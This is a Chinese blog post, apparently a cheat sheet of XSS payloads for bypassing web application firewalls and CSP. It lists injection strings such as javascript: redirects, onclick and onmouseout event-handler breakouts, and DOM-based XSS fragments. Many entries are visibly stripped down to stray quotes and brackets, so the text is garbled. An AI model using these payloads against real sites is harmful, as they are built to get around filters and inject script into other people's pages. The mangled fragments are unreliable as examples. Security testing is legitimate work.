xss绕waf篇

本文仅供学习探讨,切勿用于非法行为。

大型站点测试为了防止影响业务最好不要弹窗,使用console.log输出

XSS弹窗

	

	

	

	document.write('

奇奇怪怪的xss

	>

	

	

	

	>

	>

	Jaky

无script的xss

引入媒体类测试代码Example:

CSP & WAF Bypass

重定向 测试代码

	';redirecturl='javascript:alert("XSS")
	';redirecturl='http://google.com/'
 
	Example: www.xyz.com?q="XSS Script"

	 "/>alert("Xss:Priyanshu")
	    "/>

	
	"

	"><%2Fstyle<%2Fscript>
	    http://test.com

	

	x">

	q=" onclick="alert(/XSS/)

	">

	">

	DOM Based XSS Scripts
	    /default.aspx#">
	    /default.aspx#">

	 by ">

	“>.txt.jpg

	“>

	">

	">

	id=abc">

	">

	Default.aspx/" onmouseout="confirm(1)'x="

欺骗会话

http://localhost/test.php?title=TITLE

data数据流绕过滤

写文章的时候发现写的文章竟然弹窗了,data数据流绕过滤还是很少被开发者重视orz。

已交相应漏洞平台

网络安全CTFerXSS跨站

相关

简单了解WEB漏洞-XSS跨站

为什么要做网络安全等级保护测评

网络安全笔记

网络安全(一):常见的网络威胁及防范

安全测试---web常规安全漏洞问题介绍和防范说明,如:SQL注入攻击、XSS跨站点脚本攻击(JS注

长安“战疫”网络安全卫士守护赛部分writeup

前端网络安全——密码安全

网络安全基础

[网络安全学习篇1]:windowsxp、windows2003、windows7、windows2008系统部署(千峰网络安

网络安全之接入控制

长安“战疫”网络安全公益赛的一些随想

第三届江西省网络安全大赛-部分Crypto

标签